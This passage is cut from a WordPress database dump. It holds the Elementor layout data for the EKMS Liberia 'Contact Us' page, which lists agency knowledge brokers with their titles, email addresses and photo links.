-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21958,3185,'_elementor_edit_mode','builder'),(21959,3185,'_elementor_template_type','wp-page'),(21960,3185,'_elementor_version','3.0.12'),(21961,3185,'_wp_page_template','default'),(21962,3185,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elT